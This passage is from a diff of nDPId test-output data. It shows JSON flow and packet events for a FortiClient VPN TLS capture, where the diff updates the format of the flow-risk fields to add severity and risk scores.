{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
+01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+01409{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
+01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+01409{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"}
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01004{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
-00755{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
-00755{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
-00755{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
-00755{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
-00760{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
+01144{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01201{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01467{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 